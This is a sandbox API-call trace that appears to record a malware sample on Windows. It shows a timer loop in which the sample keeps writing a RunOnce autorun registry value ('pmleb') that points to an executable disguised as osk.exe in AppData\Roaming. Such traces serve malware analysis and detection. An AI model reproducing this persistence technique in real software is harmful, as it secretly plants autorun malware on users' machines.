[0085.964] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.964] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.964] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.964] RegCloseKey (hKey=0x280) returned 0x0 [0085.964] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.965] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.965] SetTimer (hWnd=0x20280, nIDEvent=0x21c3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c3 [0085.965] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.977] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.977] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.977] KillTimer (hWnd=0x20280, uIDEvent=0x21c3) returned 1 [0085.977] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.978] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.978] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.978] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.978] RegCloseKey (hKey=0x280) returned 0x0 
[0085.978] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.979] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.979] SetTimer (hWnd=0x20280, nIDEvent=0x21c4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c4 [0085.979] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0085.993] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0085.993] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0085.993] KillTimer (hWnd=0x20280, uIDEvent=0x21c4) returned 1 [0085.993] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.993] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0085.993] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0085.994] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0085.994] RegCloseKey (hKey=0x280) returned 0x0 [0085.994] IUnknown:Release (This=0x7a9740) returned 0x1 [0085.994] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0085.994] SetTimer (hWnd=0x20280, nIDEvent=0x21c5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c5 [0085.994] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.008] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.008] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.008] KillTimer (hWnd=0x20280, uIDEvent=0x21c5) returned 1 [0086.009] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.009] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.009] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.009] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.009] RegCloseKey (hKey=0x280) returned 0x0 [0086.010] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.010] SetTimer (hWnd=0x20280, nIDEvent=0x21c6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c6 [0086.010] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.025] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.025] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.025] KillTimer (hWnd=0x20280, uIDEvent=0x21c6) returned 1 [0086.025] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.026] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.026] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.026] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.026] RegCloseKey (hKey=0x280) returned 0x0 [0086.026] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.026] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.026] SetTimer (hWnd=0x20280, nIDEvent=0x21c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c7 [0086.026] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.040] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.040] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.041] KillTimer (hWnd=0x20280, uIDEvent=0x21c7) returned 1 [0086.041] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.041] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.041] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.042] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.042] RegCloseKey (hKey=0x280) returned 0x0 [0086.042] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.042] SetTimer (hWnd=0x20280, nIDEvent=0x21c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c8 [0086.042] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.055] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.055] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.055] KillTimer (hWnd=0x20280, uIDEvent=0x21c8) returned 1 [0086.056] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.056] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.056] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.056] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.056] RegCloseKey (hKey=0x280) returned 0x0 [0086.057] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.057] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.057] SetTimer (hWnd=0x20280, nIDEvent=0x21c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x21c9 [0086.057] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.071] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.071] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.071] KillTimer (hWnd=0x20280, uIDEvent=0x21c9) returned 1 [0086.071] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.072] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.072] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.072] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.072] RegCloseKey (hKey=0x280) returned 0x0 [0086.072] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.072] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0086.072] SetTimer (hWnd=0x20280, nIDEvent=0x21ca, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ca [0086.072] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.086] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.086] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.086] KillTimer (hWnd=0x20280, uIDEvent=0x21ca) returned 1 [0086.087] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.087] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.087] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.087] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.088] RegCloseKey (hKey=0x280) returned 0x0 [0086.088] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.088] SetTimer (hWnd=0x20280, nIDEvent=0x21cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cb [0086.088] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.102] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.102] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.102] KillTimer (hWnd=0x20280, uIDEvent=0x21cb) returned 1 [0086.102] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.103] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.103] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.103] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.103] RegCloseKey (hKey=0x280) returned 0x0 [0086.103] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.103] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.103] SetTimer (hWnd=0x20280, nIDEvent=0x21cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cc [0086.103] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.118] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.118] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.118] KillTimer (hWnd=0x20280, uIDEvent=0x21cc) returned 1 [0086.118] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.118] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.119] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.119] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.119] RegCloseKey (hKey=0x280) returned 0x0 [0086.119] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.119] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.119] SetTimer (hWnd=0x20280, nIDEvent=0x21cd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cd 
[0086.119] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.133] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.133] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.133] KillTimer (hWnd=0x20280, uIDEvent=0x21cd) returned 1 [0086.134] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.134] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.134] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.134] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.135] RegCloseKey (hKey=0x280) returned 0x0 [0086.135] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.135] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.135] SetTimer (hWnd=0x20280, nIDEvent=0x21ce, uElapse=0xa, lpTimerFunc=0x0) returned 0x21ce [0086.135] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.149] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.149] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.149] KillTimer (hWnd=0x20280, uIDEvent=0x21ce) returned 1 [0086.149] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.149] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.149] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.150] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.150] RegCloseKey (hKey=0x280) returned 0x0 [0086.150] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.150] SetTimer (hWnd=0x20280, nIDEvent=0x21cf, uElapse=0xa, lpTimerFunc=0x0) returned 0x21cf [0086.150] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.164] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.164] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.165] KillTimer (hWnd=0x20280, uIDEvent=0x21cf) returned 1 [0086.165] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.165] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.165] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.165] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.166] RegCloseKey (hKey=0x280) returned 0x0 [0086.166] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.166] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.166] SetTimer (hWnd=0x20280, nIDEvent=0x21d0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d0 [0086.166] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0086.193] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.193] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.193] KillTimer (hWnd=0x20280, uIDEvent=0x21d0) returned 1 [0086.194] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.194] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.194] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.194] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.195] RegCloseKey (hKey=0x280) returned 0x0 [0086.195] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.195] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.195] SetTimer (hWnd=0x20280, nIDEvent=0x21d1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d1 [0086.195] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.195] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.195] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.196] KillTimer (hWnd=0x20280, uIDEvent=0x21d1) returned 1 [0086.196] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.196] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.196] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.196] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.197] RegCloseKey (hKey=0x280) returned 0x0 [0086.197] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.197] SetTimer (hWnd=0x20280, nIDEvent=0x21d2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d2 [0086.197] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.211] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.211] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.211] KillTimer (hWnd=0x20280, uIDEvent=0x21d2) returned 1 [0086.212] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.212] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.212] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.212] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.213] RegCloseKey (hKey=0x280) returned 0x0 [0086.213] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.213] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.213] SetTimer (hWnd=0x20280, nIDEvent=0x21d3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d3 [0086.213] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.227] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.227] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.227] KillTimer (hWnd=0x20280, uIDEvent=0x21d3) returned 1 [0086.228] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.228] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.228] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.228] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0086.229] RegCloseKey (hKey=0x280) returned 0x0 [0086.229] IUnknown:Release (This=0x7a9740) returned 0x1 [0086.229] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.229] SetTimer (hWnd=0x20280, nIDEvent=0x21d4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21d4 [0086.229] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0086.242] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0086.242] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0086.242] KillTimer (hWnd=0x20280, uIDEvent=0x21d4) returned 1 [0086.243] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0086.243] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0086.243] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0086.243] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
